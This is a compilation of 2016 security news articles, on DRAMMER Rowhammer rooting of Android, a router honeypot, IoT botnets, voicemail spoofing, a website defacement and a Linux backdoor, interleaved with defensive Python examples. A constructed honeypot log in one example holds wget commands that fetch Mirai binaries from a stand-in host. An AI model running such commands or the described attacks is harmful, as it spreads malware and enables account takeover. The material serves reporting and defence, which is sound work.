To test the Rowhammer attack on mobile phones, the researchers created a new proof-of-concept exploit, dubbed DRAMMER, and found their exploit successfully altered crucial bits of data in a way that completely roots big brand Android devices from Samsung, OnePlus, LG, Motorola, and possibly other manufacturers.
The researchers successfully rooted Android handsets including Google's Nexus 4 and Nexus 5; LG's G4; Samsung Galaxy S4 and Galaxy S5, Motorola's Moto G models from 2013 and 2014; and OnePlus One.
"Not only does our [DRAMMER] attack show that practical, deterministic Rowhammer attacks are a real threat to billions of mobile users, but it is also the first effort to show that Rowhammer is...(reliably exploitable) on any platform other than x86 and with a much more limited software feature set than existing solutions," the researchers wrote in their paper [PDF] titled, "Drammer: Deterministic Rowhammer Attacks on Mobile Platforms."
How does the DRAMMER Attack Work? (Exploit Source Code)
The researchers created an app — containing their rooting exploit — that requires no special user permissions in order to avoid raising suspicion. The DRAMMER attack would then need a victim to download the app laced with malware (researchers' exploit code) to execute the hack.
The researchers took advantage of an Android mechanism called the ION memory allocator to gain direct access to the dynamic random access memory (DRAM).
Besides giving every app direct access to the DRAM, the ION memory allocator also allows identifying adjacent rows on the DRAM, which is an important factor for generating targeted bit flips.
Knowing this, the researchers then had to figure out how to use the bit flipping to achieve root access on the victim's device, giving them full control of the target phone and the ability to do anything from accessing data to taking photos.
"On a high level, our technique works by exhausting available memory chunks of different sizes to drive the physical memory allocator into a state in which it has to start serving memory from regions that we can reliably predict," the paper reads.
"We then force the allocator to place the target security-sensitive data, i.e., a page table, at a position in physical memory which is vulnerable to bit flips and which we can hammer from adjacent parts of memory under our control."
Once you download this malicious app, the DRAMMER exploit takes over your phone within minutes – or even seconds – and runs without your interaction. The attack continues to run even if you interact with the app or put your phone in "sleep" mode.
The researchers expect to soon publish an app [source code available here] that will let you test your Android smartphone yourself and anonymously include your results in a running tally, which will help researchers track the list of vulnerable devices.
DRAMMER Has No Quick Fix
The group of researchers privately disclosed its findings to Google in July, and the company designated the flaw as "critical," awarding the researchers $4,000 under its bug bounty program.
Google says the company has informed its manufacturing partners of the issue earlier this month and has developed a mitigation which it will include in its upcoming November security bulletin to make the DRAMMER attack much harder to execute.
However, the researchers warned that one could not replace the memory chip in Android smartphones that have already been shipped.
And even some software features that DRAMMER exploits are so fundamental and essential to any OS that they are difficult to remove or modify without impacting the user experience.
In short, the attack is not easy to patch in the next generation of Android phones.
Video Demonstration of DRAMMER Attack on Android 6.0.1
The researchers have also published two proof-of-concept videos that demonstrate DRAMMER attack in action against an unrooted LG Nexus 5.
In the first video, the phone is running Android 6.0.1 with security patches Google released on October 5.
In the second video, the researchers show how the DRAMMER attack can be combined with Stagefright bug that remains unpatched in many older Android handsets.
The Stagefright exploit gives the researchers an advanced shell, and by running the DRAMMER exploit, the shell gains root access.
The researcher's exploit can target the majority of the world's Android phones.
"Our research shows that practical large-scale Rowhammer attacks are a serious threat and while the response to the Rowhammer has been relatively slow from vendors, we hope our work will accelerate mitigation efforts both in industry and academia," the researchers concluded.
The group's research focuses on Android rather than iOS because the researchers are intimately familiar with Google's mobile OS, which is based on Linux. But the group says it would theoretically be possible to replicate the same attack on an iPhone with additional research.
For more detailed information, you can head on to this informational page about DRAMMER and this paper published early this morning.
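Both write-ups above explain that a Rowhammer bit flip silently changes data in a neighbouring row, and that the memory chips in shipped phones cannot be replaced. The following added example, written for this page and not the VUSec researchers' code, models that on one 64-bit word protected by a Hamming SECDED code, the scheme ECC memory uses, to show what a hardware detection layer would see: a single flipped bit is detected and corrected, while two flips in the same word are detected but cannot be corrected. The data word and the flipped positions are constructed for illustration.

```python
DATA_BITS = 64
PARITY_BITS = 7                          # smallest r with 2**r >= 64 + r + 1
CODE_LEN = DATA_BITS + PARITY_BITS + 1   # 72 bits; position 0 is the overall parity bit

# Codeword positions that carry data: every position that is not a power of two.
DATA_POSITIONS = [p for p in range(1, CODE_LEN) if p & (p - 1)]


def _parity(value):
    return bin(value).count("1") & 1


def encode(word):
    """Hamming(71,64) plus an overall parity bit = 72-bit SECDED codeword.
    The codeword is returned as an int whose bit p is codeword position p."""
    if not 0 <= word < (1 << DATA_BITS):
        raise ValueError("word must be a 64-bit value")
    code = 0
    for k, p in enumerate(DATA_POSITIONS):
        if (word >> k) & 1:
            code |= 1 << p
    for j in range(PARITY_BITS):
        mask = 1 << j
        # parity bit 2**j covers every position whose index has bit j set
        covered = sum((code >> p) & 1 for p in range(1, CODE_LEN) if p & mask)
        code |= (covered & 1) << mask
    code |= _parity(code)                # position 0: parity over the whole codeword
    return code


def flip_bits(code, positions):
    """Model the effect of a Rowhammer-induced flip at the given codeword positions."""
    for p in positions:
        code ^= 1 << p
    return code


def decode(code):
    """Return (word, status): 'ok', 'corrected' (one flip repaired) or
    'uncorrectable' (two flips detected; word is None)."""
    syndrome = 0
    for p in range(1, CODE_LEN):
        if (code >> p) & 1:
            syndrome ^= p                # XOR of set positions names the bad position
    overall_bad = _parity(code)          # a single flip always breaks overall parity
    if syndrome == 0 and not overall_bad:
        status = "ok"
    elif overall_bad:
        code ^= 1 << syndrome            # syndrome 0 here means position 0 itself flipped
        status = "corrected"
    else:
        return None, "uncorrectable"     # syndrome set, parity intact: an even number of flips
    word = 0
    for k, p in enumerate(DATA_POSITIONS):
        if (code >> p) & 1:
            word |= 1 << k
    return word, status


if __name__ == "__main__":
    original = 0xDEADBEEFCAFEF00D          # constructed sample word
    code = encode(original)
    for flips in ([], [17], [17, 42]):
        print(flips, "->", decode(flip_bits(code, flips)))
```

The point for a defender is the asymmetry: the single flips that DRAMMER needs become a logged, corrected event under SECDED, and a double flip becomes a detectable fault rather than silent corruption. Consumer phone DRAM generally lacks this protection, which is why the researchers say the shipped devices cannot be fixed in hardware.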
Money for technology yes, for training people no: companies risk their data security failing
24.10.2016 SecurityWorld Threats
Companies in the Czech Republic understand the importance of securing their data and applications and invest considerable resources in technology. But they often forget that they should also invest in the people who work with these technologies.
According to surveys, up to two thirds of companies are now largely dependent on IT, and the volume of accumulated data grows by a third every year.
Company management overwhelmingly regards securing data and systems as a priority; according to Gartner, security investments have currently grown by 3.6% year on year.
But they often forget to invest in the people who work with these systems, which drastically reduces both their ability to defend themselves effectively and the efficiency of the money spent. Yet almost 70% of companies experienced data theft or damage, or an attempt at it, in the past year.
“Top managers now realize that investing in the security of corporate data and systems is essential. But they rarely also remember that the systems alone, without trained experts who keep up with current trends and threats, are ineffective,” says William Ischanoe, product manager for IT security courses at Gopas.
Gopas is holding its key HackerFest 2016 conference on IT security and ethical hacking these days. It presents, for example, how today’s hackers attack, what dangers lurk in cyberspace, what the biggest current hacking threats are, and what hackers use compromised computers for. Our publishing house is a partner of the conference.
24 hours in the life of my home router by Francisco J. Rodriguez
24.10.2016 securityaffairs Attack
Recently a massive DDoS attack disconnected a large portion of users from the Internet; the hackers exploited IoT devices. Is your router secure?
“Are we ready to live in a world where all devices are exposed to cyber attacks?”
That is how I opened my presentation at QurtubaCON16 – a cyber security event in Córdoba (Spain) – and how I will open the next event, HoneyCON16 (Guadalajara, Spain), on November 11th. My intention is for everyone to draw their own conclusions about the risks we all assume every time we connect our devices to the Internet.
Have you ever wondered what happens inside your home router and what threats lurk from the moment you press the power button?
In this article I analyze the attacks and cybersecurity events received by my personal router on a Spanish ISP. This information may make you aware of the high risk of having these devices connected to the web, even as we expose our lives on social media.
I exposed my personal router to possible attacks because home routers have not been receiving the appropriate attention and, in some cases, people tend to leave them on all year round. People tend to leave these devices completely exposed and do not realize that sometimes the administrator control panel is vulnerable, that they are open to certain attacks, or that they have security flaws that have not been patched either by the Internet provider or by the device manufacturer.
We recommend visiting http://routersecurity.org/ for more information about bugs and vulnerabilities detected in home routers in recent years, along with some recommendations.
In recent years, there has been news about vulnerabilities in routers distributed in Spain that show the seriousness of the matter:
http://www.hackplayers.com/2015/02/250k-routers-de-telefonica-mismas-claves-ssh.html
http://www.muycomputer.com/2015/03/20/700-000-routers-adsl-isp-vulnerables
http://www.redeszone.net/2015/01/06/los-routers-de-movistar-adb-pirelli-p-dga4001n-tienen-un-grave-fallo-de-seguridad/
http://www.pcworld.es/seguridad/un-estudio-espanol-descubre-60-vulnerabilidades-en-22-modelos-de-routers
What if an attacker gains access to the DNS settings of your router and modifies it?
It is not just about losing our privacy (a cybercriminal could monitor your Internet browsing); it is about letting an attacker steal your identity, for example by capturing your credentials for your personal bank or company website. This is just one example of what could really happen.
In many cases the attacks received are automated, so if your router is within a cybercriminal's scanning range you could be a potential victim. The typical excuse “I am nobody” is not valid. You only need to be in range; it does not need to be a personal attack. The greater the number of potential victims, the greater the percentage of success.
To collect all these events and cyberattacks, I use a sensor that redirects all the traffic addressed to my public IP, which corresponds to my own router. I monitor all incoming activity across the TCP and UDP port ranges, and I also monitor ICMP packets. I consider all traffic addressed to my IP suspicious and I follow up every connection attempt to my TCP ports.
Keep in mind that the IP address of a possible attacker is not by itself a relevant fact, since different techniques can be used to hide the real source IP, or the attacker can route the attack through a device that has already been breached. At no time did I advertise my IP address in order to receive attacks.
Data collection occurred between Wednesday, October 6 at 6PM and Thursday, October 24 at 6PM.
Once the data collection period finished, these are the results:
In 24 hours my home router received a total of 20,070 events, of which I classify 4,678 as attacks. Connections arrived from 92 different countries and targeted a total of 349 different ports.
More than half of the events came from Asia. Among the ports that received the most connections, SSH, Telnet, 443, 2323, RDP, VNC and 8080 stand out, among other services. Since I never published that my services were exposed, we might ask ourselves what they are looking for and how they found me. We can find out by analyzing everything that occurred.
Among the origins of events, it has lately become normal to find Vietnam at the top. The explanation can be found in detail in the following article: http://securityaffairs.co/wordpress/52015/hacking/mirai-botnet.html
This is due to the large number of IoT devices infected with Mirai that have Spanish IP addresses among their targets.
The graph above shows the traffic received from attacks (not all the events) during these 24 hours of analysis (origin country, ASN, IP and port):
Some notable countries by the number of attacks carried out (A, IP and port):
Most of the attacks received were of European and Asian origin. We also received a small share of attacks from Spain.
Analyzing some of the IPs that attacked my router, I found the following web administration panels belonging to cameras and routers:
Some of them require no credentials for access and others use default credentials. They (or perhaps some machine behind that network) have visited my router, connected to my decoy ports, downloaded malware samples, tried to enlist me in their botnet and used my gateway for attacks, among other activities.
Several malware samples were downloaded, including Mirai:
But it was not the only malware they tried to download. Below you can see the large number of download attempts made using wget:
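As an added example (not the author's tooling or data), the script below shows how sensor data of the kind described in this article can be reduced to the figures reported above: events versus attacks, distinct countries and ports, the busiest decoy services, and the download URLs that wget attempts leave in captured Telnet sessions. The log format, the attack criterion (a TCP session that actually reached a decoy service, while bare SYN scans, UDP probes and ICMP stay plain events), the port-to-service mapping and the sample lines are all constructed assumptions; addresses come from documentation ranges.

```python
"""Summarise home-router honeypot events. Constructed example, not the author's tooling."""
import re
from collections import Counter

# Decoy services mentioned in the article, keyed by port (assumed mapping).
SERVICE_NAMES = {22: "SSH", 23: "Telnet", 443: "HTTPS", 2323: "Telnet-alt",
                 3389: "RDP", 5060: "SIP", 5900: "VNC", 8080: "HTTP-alt"}

# Constructed sensor log: one event per line, key=value fields; cmd holds any
# shell input the Telnet decoy captured. IPs are from documentation ranges.
SAMPLE_LOG = """\
2016-10-06T18:00:03 src=203.0.113.10 cc=VN proto=tcp dport=23 state=connected cmd="enable; sh; wget http://198.51.100.9/bins/mirai.arm7 -O /tmp/.x"
2016-10-06T18:00:04 src=203.0.113.10 cc=VN proto=tcp dport=2323 state=connected cmd=""
2016-10-06T18:02:11 src=198.51.100.25 cc=CN proto=tcp dport=22 state=connected cmd=""
2016-10-06T18:05:40 src=192.0.2.77 cc=US proto=tcp dport=443 state=syn cmd=""
2016-10-06T18:07:15 src=192.0.2.77 cc=US proto=tcp dport=8080 state=syn cmd=""
2016-10-06T18:09:59 src=203.0.113.88 cc=ES proto=tcp dport=3389 state=connected cmd=""
2016-10-06T18:12:30 src=203.0.113.12 cc=VN proto=tcp dport=23 state=connected cmd="wget http://198.51.100.9/bins/mirai.mips -O /tmp/.y"
2016-10-06T18:15:02 src=198.51.100.40 cc=RU proto=udp dport=5060 state=data cmd=""
2016-10-06T18:20:47 src=192.0.2.200 cc=BR proto=icmp dport=0 state=echo cmd=""
2016-10-06T18:22:05 src=203.0.113.88 cc=ES proto=tcp dport=5900 state=syn cmd=""
"""

KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')
WGET_RE = re.compile(r"\bwget\s+(?:-\S+\s+)*(https?://\S+)")


def parse_event(line: str) -> dict:
    """Turn one log line into a dict; dport becomes an int (0 for ICMP)."""
    ts, _, rest = line.partition(" ")
    ev = {"ts": ts}
    for key, val in KV_RE.findall(rest):
        ev[key] = val[1:-1] if val.startswith('"') else val
    ev["dport"] = int(ev.get("dport", 0))
    return ev


def is_attack(ev: dict) -> bool:
    """Assumed criterion: a TCP session that completed to a decoy service."""
    return ev.get("proto") == "tcp" and ev.get("state") == "connected"


def download_urls(events: list) -> list:
    """wget targets seen in captured commands, in log order, de-duplicated."""
    seen, urls = set(), []
    for ev in events:
        for url in WGET_RE.findall(ev.get("cmd", "")):
            if url not in seen:
                seen.add(url)
                urls.append(url)
    return urls


def summarize(lines: list) -> dict:
    """Aggregate raw events into the headline figures of a 24-hour report."""
    events = [parse_event(line) for line in lines if line.strip()]
    attacks = [ev for ev in events if is_attack(ev)]
    port_hits = Counter(ev["dport"] for ev in events if ev["proto"] != "icmp")
    return {
        "events": len(events),
        "attacks": len(attacks),
        "countries": len({ev["cc"] for ev in events}),
        "ports": len(port_hits),
        "top_ports": [(p, SERVICE_NAMES.get(p, "?"), n) for p, n in port_hits.most_common(5)],
        "attacks_by_country": Counter(ev["cc"] for ev in attacks),
        "download_urls": download_urls(attacks),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LOG.splitlines()).items():
        print(f"{key}: {value}")
```

The extracted URLs are the part worth keeping: they are the indicators you would hand to the ISP or block at the gateway, and counting them per source country separates scanner noise from hosts that actually tried to stage a payload.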
Having seen all this data, you should ask yourself whether your home router could be attacked. Don't ask whether it will be attacked: ask when. Considering the information presented in this article, maybe you are a little more aware that it will happen to you sooner or later. I hope that by now you do not have your router exposed, your credentials are not too weak, and you have not exposed more information than necessary. Maybe you have already been attacked and still don't know it.
If you do not keep these tips in mind, perhaps your IP address will appear on the next list.
Best regards.
This and other articles are available at www.fwhibbit.es
My talk about honeypots:
Twitter: @0fjrm0
Hackers offered an IoT botnet for $7,500. The recent attack may be just a test
24.10.2016 securityaffairs BotNet
The security firm RSA revealed that in early October it discovered hackers advertising access to a huge IoT botnet on an underground criminal forum.
Last week, a massive DDoS attack against the Dyn DNS service, one of the most authoritative domain name system (DNS) providers, caused an extended Internet outage. A large portion of Internet users was unable to reach major web services; many websites, including Twitter, GitHub, PayPal, Amazon, Reddit, Netflix and Spotify, were down for netizens in the US.
The Dyn DNS service was flooded by a devastating wave of requests originating from millions of compromised IoT devices. The Dyn company reported that a huge army of hijacked Internet of Things devices had been abused by attackers to power the massive DDoS attack.
The security intelligence firm Flashpoint published an interesting post on the massive DDoS attack in which it confirmed that its experts had observed Mirai bots driving the attack against Dyn DNS.
“Flashpoint has confirmed that some of the infrastructure responsible for the distributed denial-of-service (DDoS) attacks against Dyn DNS were botnets compromised by Mirai malware. Mirai botnets were previously used in DDoS attacks against security researcher Brian Krebs’ blog “Krebs On Security” and French internet service and hosting provider OVH.” reads the analysis published by Flashpoint “Mirai malware targets Internet of Things (IoT) devices like routers, digital video records (DVRs), and webcams/security cameras, enslaving vast numbers of these devices into a botnet, which is then used to conduct DDoS attacks. “
Below are the key findings of the report published by Flashpoint:
Flashpoint has confirmed that some of the infrastructure responsible for the distributed denial-of-service (DDoS) attacks against Dyn DNS were botnets compromised by Mirai malware.
Mirai botnets were previously used in DDoS attacks against the “Krebs On Security” blog and OVH.
As of 1730 EST, the attacks against Dyn DNS are still ongoing. Flashpoint is coordinating with multiple vendors and law enforcement to track the infected devices that constitute the botnet being used to conduct these attacks.
Unfortunately, the situation could be worse because hackers are selling access to a huge botnet composed of compromised Internet of Things (IoT) devices.
The security firm RSA revealed that in early October it discovered hackers advertising access to a huge IoT botnet on an underground criminal forum.
“This is the first time we’ve seen an IoT botnet up for rent or sale, especially one boasting that amount of firepower. It’s definitely a worrying trend seeing the DDoS capabilities grow,” Daniel Cohen, head of the RSA’s FraudAction business unit, told Forbes.
According to RSA, the hackers advertised an IoT botnet able to power DDoS attacks with 1 Tbps of traffic, the same volume that flooded the French hosting provider OVH. It is not clear whether the botnet was composed of devices infected by the Mirai malware.
The hackers were offering a botnet of 50,000 devices for $4,600, while 100,000 bots cost $7,500.
Cohen clarified that RSA has no evidence that the botnet is linked to the infrastructure that hit the Dyn DNS service on Friday.
“Hackers have long sold access to botnets, though haven’t explicitly advertised their use of IoT devices like connected cameras, fridges and kettles. The infamous LizardSquad amassed sizeable botnets for its LizardStresser “booter” – a DDoS weapon for hire – but it largely compromised vulnerable routers.” reported FORBES.
IoT vendors have been warned of the risk of future cyber attacks; the Chinese manufacturer of surveillance and home video devices targeted by the Mirai botnet, Xiongmai Technology (XM), has pushed out patches to prevent the hacking of its devices.
However, any device running firmware released before September 2015 that still uses the default username and password (well known in the hacker community) remains vulnerable to attacks that use those credentials to access the device via Telnet.
Attacks like the one powered by the IoT botnet on Friday are difficult to mitigate; however, adopting a secondary, backup DNS provider could make it harder for an attacker to take a web service down.
Other countermeasures are listed in the FORBES blog post.
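The backup-provider advice above is easy to state and easy to get wrong, so here is an added example (not from Forbes, RSA or Dyn) of how to audit a zone's delegation for it: group the NS hostnames by operator and simulate losing one operator entirely, as a DDoS on that operator's infrastructure would. The NS sets are constructed placeholder names, and the "last two labels identify the provider" heuristic is an assumption that a production check should replace with an IP-to-ASN lookup.

```python
"""Delegation diversity check: does a zone still resolve if one DNS provider is down?
Added example; the NS sets below are constructed placeholders, not real delegations."""
from collections import defaultdict


def provider_of(ns_name: str) -> str:
    """Approximate the operator by the registrable domain of the NS hostname.
    Assumption: the last two labels identify the provider. This misfires for
    providers that spread servers over many domains or for ccTLDs such as
    .co.uk; map NS addresses to ASNs in a real audit."""
    labels = ns_name.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def group_by_provider(ns_names) -> dict:
    """Map each operator to the NS hostnames it serves."""
    groups = defaultdict(list)
    for ns in ns_names:
        groups[provider_of(ns)].append(ns.rstrip(".").lower())
    return dict(groups)


def has_backup_provider(ns_names) -> bool:
    """True when the NS set is served by at least two distinct operators."""
    return len(group_by_provider(ns_names)) >= 2


def survives_provider_outage(ns_names, down_provider: str) -> bool:
    """Simulate a whole operator being unreachable: resolvers can still find
    an authoritative answer only if some NS outside that operator remains."""
    return any(provider_of(ns) != down_provider.lower() for ns in ns_names)


# Constructed delegations: four servers at one operator versus two at each of two.
SINGLE_PROVIDER = ["ns1.dnsprovider-a.example.", "ns2.dnsprovider-a.example.",
                   "ns3.dnsprovider-a.example.", "ns4.dnsprovider-a.example."]
DUAL_PROVIDER = SINGLE_PROVIDER[:2] + ["ns1.dnsprovider-b.example.",
                                       "ns2.dnsprovider-b.example."]

if __name__ == "__main__":
    for label, ns_set in (("single", SINGLE_PROVIDER), ("dual", DUAL_PROVIDER)):
        print(label, group_by_provider(ns_set),
              "backup:", has_backup_provider(ns_set),
              "survives outage of A:", survives_provider_outage(ns_set, "dnsprovider-a.example"))
```

Four NS records at one operator look redundant but share one fate; the check only passes when the delegation, as published at the parent zone, lists servers at two operators that both carry a current copy of the zone.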
InTheCyber discovered a serious flaw in messaging systems
24.10.2016 securityaffairs Mobil
Researchers at the firm InTheCyber have discovered a new, easily exploitable and dangerous vulnerability affecting messaging systems.
InTheCyber – Intelligence & Defense Advisors (www.inthecyber.com), a leader in offensive and defensive cyber security, has discovered in its R&D labs a new, easy and dangerous vulnerability affecting messaging systems.
Voicemail caller-ID spoofing is quite an old flaw. When the mobile operator relies on the caller ID to authenticate the user to his voicemail, an attacker can falsify the caller ID in order to impersonate the user and gain access to his voicemail. At the moment, two of the biggest Italian mobile operators allow this kind of attack.
This undoubtedly raises problems about the privacy of the communications, especially the information stored inside the voicemail. Moreover, this old flaw could be weaponized in order to compromise other services.
For example, when an activation code is requested, Telegram, WhatsApp and Signal first send an SMS with the activation code. If the code is not entered promptly, these services resend the activation code through an automated call.
Depending on the configuration of the user's voicemail, the authentication code will end up in the voicemail in the following scenarios: the user does not answer, the user is not reachable, or the user is busy. In the first scenario, an attacker could try to request an activation code for the victim's account during the night. In the second, an attacker could send multiple silent SMS messages to the user to determine when the phone is detached from the network and then start the attack. In the third, a telephone scam could be used during the attack to keep the phone busy.
Besides caller-ID spoofing, voicemail services often rely on a default or guessable PIN to authenticate a user, for example when he tries to access his voicemail from another phone number.
Basically, if the voicemail is somehow accessible to an unauthorized person and no two-factor authentication is enabled, every service that relies on an automated call to deliver an activation code can be hijacked.
Below is a video PoC of the hack:
Terrorism activity continues unabated – Tower of Babel under the surface
24.10.2016 securityaffairs Crime
This increase in activity led intelligence experts at Global Intelligence Insight to raise the level of the terrorism threat in Italy to #1.
With the eyes of the world set on the American Presidential elections on one side, and on Aleppo, Mosul and most recently Kirkuk on the other, underneath the online surface of the internet, multilingual jihadist channels and chat rooms spread like wildfire on protected, private and invite-only platforms, such as Telegram or ChatSecure.
Besides the usual terrorism and pro-violence propaganda and gore videos of executions portraying jihadists as rock stars proudly holding AKs and explosive vests (some of them children aged no more than 7-9), the growing urgency of these radicals to widen the reach of their message to more countries is noticeable – always with the goal of converting lone wolves (often described as “turbo conversions”, considering how rapidly it has been happening) and of planning operations, including how to set up the logistics. Hence the relevance of language.
The geography of attack planning is strictly connected with the increasing activity and use of a certain language in both channels and chat groups.
Portuguese from Portugal, Italian, Urdu and Bengali are the most recent focuses (English and French are always a given).
Through our 24/7 monitoring and active infiltration in these hundreds of chatrooms, we can establish several types of correlations between the users, and extrapolate conclusions with quantifiable data. Some of the most recent ones are quite surprising even to our most experienced analysts.
Lately, we have identified a rapid and aggressive adherence to Italian channels. As an example, a recently created Italian channel had an increase of 430 active members in just 36 hours, and this uncommon pattern made several alarms ring all over our offices.
We are talking about gatekeepers, operatives displaying tactical experience and a general population of sympathizers to the Salafi jihadist cause, communicating and sharing propaganda and battlefront news in fluent Italian.
This increase in terrorism-linked activity led us to raise the threat level in Italy to Tier #1 and to look out for any kind of ongoing operation.
There are also many other types of transversal trends that we analyze and correlate, to validate a certain conclusion, such as the most recent and growing concern on communicating in the most secure and anonymous way possible. The release of detailed and complex manuals by the so-called “Islamic OPSEC IT Team”, with contents clearly developed by IT professionals, is a clear illustration of this fact.
And with the self-proclaimed Islamic State being gradually strangled in both Syria and Iraq, suffering heavy casualties north and south, many seasoned veterans are already trying to make their way to Europe. The idea of a command center physically set up and issuing instructions – a notion to which several intelligence companies still tend to cling – is completely obsolete.
This war's most urgent frontline is still – and will continue to be – online.
NOTE: This brief article is a part of a full intelligence assessment developed by Global Intelligence Insight.
Paolo Cardoso, MA – With over 10 years of experience in Public Diplomacy and Business Intelligence, and having developed several strategic investment projects in the fields of Security, Defense and Energy in Kosovo, Bulgaria, Poland, Ukraine, Armenia, Georgia and Russian Federation, today he is the President and Co-founder of the Portuguese Euro-Atlantic Diplomacy Agency, and an Intelligence Analyst at Global Intelligence Insight.
American hacker The Jester defaced a Russian Government website
23.10.2016 securityaffairs Hacking
The popular American hacker The Jester defaced a Russian Government website in retaliation for the recent attacks against US targets.
We are in the middle of a battle in the cyberspace, with the advent of Presidential elections experts observed an intensification of the hacking attacks.
While hackers target parties and personnel involved in the Presidential campaigns, the US Government is threatening Russia, blaming its cyber army for the attacks.
There aren’t only nation state actors involved in the battle, there are also hacktivists and patriotic hackers that could power cyber attacks against the adversary.
This week, hackers from the NewWorldHackers crew and Anonymous targeted the Dyn DNS service to send a message to Russia, and in the same hours the notorious American cyber vigilante The Jester defaced the website of the Russian Ministry of Foreign Affairs, MID.ru.
The hack was not so complicated for the expert hacker, who found a flaw in the website and exploited it to hack the Russian Government portal.
The Jester targeted the website of the Russian Government in retaliation for attacks against the American entities.
The popular hacker gained access to the Russian government ministry’s website and posted the following message:
“Stop attacking Americans.”
“Comrades! We interrupt regular scheduled Russian Foreign Affairs Website programming to bring you the following important message,” he wrote. “Knock it off. You may be able to push around nations around you, but this is America. Nobody is impressed.”
“His hacking of the website included this gag: Visitors are subjected to the ear-piercing sound of an American civil alert message — that shrieking dial tone that accompanies emergency weather broadcasts.” reported the CNNmoney.
The Jester sent a message to President Putin to blame him for lying about the involvement of Russian hackers in the recent attacks against the American organizations.
“Let’s get real, I know it’s you, even if by-proxy, and you know it’s you,” he wrote. “Now, get to your room. Before I lose my temper.”
JΞSTΞR ✪ ΔCTUAL³³º¹ @th3j35t3r
#ICYMI MSG 'From Russia with Love' - I'm Jester & I approve this message via the Russian Foreign Affairs Website >> http://bit.ly/2egvpiM
20:32 - 22 Oct 2016
In the past, The Jester vigilante has conducted several operations against jihadist communities online. The popular hacker told CNNMoney journalists that he chose to attack the Russian Government website in response to the massive DDoS against the Dyn DNS service that cut off a large portion of US netizens from the Internet.
“I wanted to poke them in the eye and stop feeling like US is just taking it on the chin. Again,” he said. “I’m not gonna sit around watching these f—-rs laughing at us.”
“It’s 4 a.m. in Moscow right now and a weekend. I’m hoping they can’t fix the hole til Monday,” he said.
“Think of this as a professional courtesy,” his public warning states. “Or if you prefer message from ‘USA with love.'”
Linux.BackDoor.FakeFile.1, a new Linux backdoor in the wild
23.10.2016 securityaffairs Virus
Security researchers at the security firm Doctor Web have spotted a new Linux backdoor dubbed Linux.BackDoor.FakeFile.1 in the wild.
Security firms continue to observe an increasing number of malware specifically designed to target Linux-based systems.
Linux, like any other operating system, can be infected by malicious code designed to compromise hosts and gain control over them.
Linux architectures are everywhere; it is quite easy for crooks to find vulnerable Linux servers exposed on the Internet or poorly designed Internet of Things devices that are not properly configured or protected.
It is normal for cyber criminals to focus their efforts on hacking Linux systems too. Linux malware is a natural evolution of the threat landscape because Linux is the preferred platform in data centers, business cloud infrastructure and application servers.
Linux is also the core of Android devices and many other embedded systems.
The latest malware observed in the wild is Linux.BackDoor.FakeFile.1, spotted by experts at the security firm Dr.Web.
The Linux.BackDoor.FakeFile.1 Trojan spreads through PDF, Microsoft Office or OpenOffice documents.
When the victim launches the file and triggers the execution of the malware, it saves itself to the folder .gconf/apps/gnome-common/gnome-common in the user's home directory.
Then Linux.BackDoor.FakeFile.1 searches for a hidden file whose name matches the file name of the malware and replaces its own executable file with that hidden file.
“For instance, if an ELF file of Linux.BackDoor.FakeFile.1 is named AnyName.pdf, the Trojan will search for a hidden file under the name .AnyName.pdf and then replace the original file with it by using the command mv .AnyName.pdf AnyName.pdf. If the file is not found, Linux.BackDoor.FakeFile.1 creates it and opens it in the program gedit.” reads the analysis published by DrWeb.
The malware checks the installed Linux distribution; for every distro other than openSUSE, it writes a command to the file <HOME>/.profile or <HOME>/.bash_profile to gain persistence. The next step is retrieving the configuration data from its file and decrypting it; then the Trojan launches the following threads:
The first thread communicates with the command and control (C&C) server.
The second thread monitors the duration of the connection, which is shut down after 30 minutes without activity.
Below is the complete list of Linux.BackDoor.FakeFile.1's capabilities:
Send the C&C server the quantity of messages transferred during the session;
Send a list of the contents of the specified folder;
Send the C&C server the specified file or a folder with all its contents;
Delete a directory;
Delete a file;
Rename a folder;
Remove itself;
Launch a new copy of a process;
Close the current session;
Establish backconnect and run sh;
Terminate backconnect;
Open the executable file of the process for writing;
Close the process file;
Create a file or folder;
Write the transmitted values to a file;
Obtain the names, permissions, sizes, and creation dates of files in the specified directory;
Set 777 privileges on the specified file;
Terminate the backdoor’s operation.
The researchers from Dr.Web highlighted that Linux.BackDoor.FakeFile.1 does not require root privileges to work; it operates with the current user's rights.
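Because the backdoor runs entirely with user rights, every artifact described above lives under the victim's home directory, which makes it cheap to hunt for. The following is an added example written from the Dr.Web description quoted in this article (not Dr.Web's own tooling or a real sample): it looks for the persistence folder, for autostart lines in .profile or .bash_profile that point at it, and for document-named files that begin with the ELF magic together with the hidden ".Name.ext" decoy the malware swaps in. The home-directory fixture, the list of document extensions and the exact autostart command are constructed assumptions; the analysis only says that a command is written to the profile file.

```python
"""Hunt for Linux.BackDoor.FakeFile.1-style artifacts in a home directory.
Added example based on the Dr.Web description; the fixture below is constructed."""
import tempfile
from pathlib import Path

# Paths named in the Dr.Web analysis.
PERSIST_DIR = Path(".gconf/apps/gnome-common/gnome-common")
PROFILE_FILES = (".profile", ".bash_profile")
# Document extensions the lure files imitate (assumed list, extend as needed).
DOC_SUFFIXES = {".pdf", ".doc", ".docx", ".odt", ".xls", ".xlsx", ".ppt", ".pptx"}
ELF_MAGIC = b"\x7fELF"


def is_elf(path: Path) -> bool:
    """A document-named file that starts with the ELF magic is a disguised executable."""
    try:
        with path.open("rb") as fh:
            return fh.read(4) == ELF_MAGIC
    except OSError:
        return False


def scan_home(home: Path) -> dict:
    """Return the indicators found under one home directory."""
    findings = {"persistence_dir": None, "profile_lines": [],
                "masquerading_elf": [], "decoy_pairs": []}

    # 1. The folder the backdoor copies itself into.
    persist = home / PERSIST_DIR
    if persist.exists():
        findings["persistence_dir"] = str(persist.relative_to(home))

    # 2. Autostart lines in the shell profiles that reference that folder.
    for name in PROFILE_FILES:
        profile = home / name
        if profile.is_file():
            for lineno, line in enumerate(profile.read_text(errors="replace").splitlines(), 1):
                if "gnome-common/gnome-common" in line:
                    findings["profile_lines"].append((name, lineno, line.strip()))

    # 3. Document-named ELF files and the hidden ".Name.ext" decoy beside them.
    for path in sorted(home.rglob("*")):
        if not path.is_file() or path.name.startswith("."):
            continue
        if path.suffix.lower() in DOC_SUFFIXES and is_elf(path):
            rel = str(path.relative_to(home))
            findings["masquerading_elf"].append(rel)
            twin = path.with_name("." + path.name)
            if twin.is_file():
                findings["decoy_pairs"].append((rel, str(twin.relative_to(home))))
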